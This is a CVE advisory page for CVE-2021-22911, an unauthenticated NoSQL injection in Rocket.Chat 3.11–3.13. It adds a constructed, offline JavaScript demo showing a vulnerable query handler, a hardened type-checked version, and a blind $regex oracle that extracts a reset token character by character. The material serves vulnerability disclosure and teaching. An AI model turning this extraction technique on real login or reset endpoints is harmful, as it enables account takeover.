CVE Vulnerabilities

CVE-2021-22911

Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)

Published: May 27, 2021 | Modified: Nov 21, 2024
CVSS 3.x: 9.8 CRITICAL (source: NVD)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 2.x: 7.5 HIGH
AV:N/AC:L/Au:N/C:P/I:P/A:P

An improper input sanitization vulnerability exists in Rocket.Chat server 3.11, 3.12 and 3.13 that could lead to unauthenticated NoSQL injection, potentially resulting in RCE.

Weakness

The product does not adequately filter user-controlled input for special elements with control implications.
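The weakness class in working code, as an added example that is not Rocket.Chat's code and does not appear on this page: a Node.js handler that forwards JSON-parsed request fields straight into a MongoDB-style filter, the hardened form that type-checks each scalar before it reaches the query, and the blind regex oracle an unauthenticated caller can run against the vulnerable form. The collection, the field names (username, resetToken), the handler names and the in-memory matcher are all constructed for the example; the page does not say which Rocket.Chat endpoint or field was affected, so nothing here should be read as the actual exploit.

```javascript
// Added illustration of unauthenticated NoSQL (operator) injection.
// NOT Rocket.Chat code. The collection, field names and the matcher are
// constructed so the file runs offline without a MongoDB instance.

// Constructed sample collection (stand-in for a users / tokens collection).
const USERS = [
  { username: 'alice', resetToken: 'Qz9x' },
  { username: 'bob',   resetToken: 'k2Mp' },
];

// Minimal stand-in for MongoDB filter matching: plain equality plus the
// $regex and $ne operators, enough to show operator injection. A real driver
// accepts many more operators (assumption: behaviour mirrors the driver for
// these three cases only).
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    const value = doc[field];
    if (cond !== null && typeof cond === 'object') {
      return Object.entries(cond).every(([op, arg]) => {
        if (op === '$regex') return new RegExp(arg).test(String(value));
        if (op === '$ne') return value !== arg;
        throw new Error(`unsupported operator ${op}`);
      });
    }
    return value === cond;
  });
}

function find(filter) {
  return USERS.filter((doc) => matches(doc, filter));
}

// Vulnerable handler: body.username and body.resetToken come straight from a
// JSON-parsed HTTP body and are used as-is in the filter, so an object such as
// {"$regex": "^Q"} is interpreted as a query operator instead of a string.
function lookupVulnerable(body) {
  return find({ username: body.username, resetToken: body.resetToken }).length > 0;
}

// Hardened handler: every value that is meant to be a scalar is type-checked,
// so operator objects are rejected before they can reach the query.
function requireString(value, name) {
  if (typeof value !== 'string') throw new TypeError(`${name} must be a string`);
  return value;
}

function lookupHardened(body) {
  const username = requireString(body.username, 'username');
  const resetToken = requireString(body.resetToken, 'resetToken');
  return find({ username, resetToken }).length > 0;
}

// Blind extraction: the handler only answers true/false, but with $regex the
// caller can use it as an oracle and recover the secret one character at a
// time, anchoring each probe on the prefix recovered so far.
const ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';

function extractToken(lookup, username, maxLen = 16) {
  let prefix = '';
  for (let i = 0; i < maxLen; i++) {
    let hit = null;
    for (const c of ALPHABET) {
      // ALPHABET contains no regex metacharacters, so no escaping is needed.
      if (lookup({ username, resetToken: { $regex: `^${prefix + c}` } })) {
        hit = c;
        break;
      }
    }
    if (hit === null) break;
    prefix += hit;
    // A fully anchored match tells the caller the whole secret is recovered.
    if (lookup({ username, resetToken: { $regex: `^${prefix}$` } })) return prefix;
  }
  return prefix;
}

// Runs the oracle against both handlers: the vulnerable one leaks the token,
// the hardened one rejects the very first operator-bearing request.
function demo() {
  const leaked = extractToken(lookupVulnerable, 'alice');
  let blocked;
  try {
    extractToken(lookupHardened, 'alice');
    blocked = false;
  } catch (err) {
    blocked = err instanceof TypeError;
  }
  return { leaked, blocked };
}

console.log(demo());
```

The hardened handler rejects anything that is not a string rather than stripping `$`-prefixed keys, because an allow-list of expected types is easier to audit than a deny-list of operator names; the same check belongs on every field that ends up in a filter, not only on credentials.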

Affected Software

Name         Vendor       Start Version        End Version
Rocket.chat  Rocket.chat  3.11.0 (including)   3.11.0 (including)
Rocket.chat  Rocket.chat  3.12.0 (including)   3.12.0 (including)
Rocket.chat  Rocket.chat  3.13.0 (including)   3.13.0 (including)

Potential Mitigations

References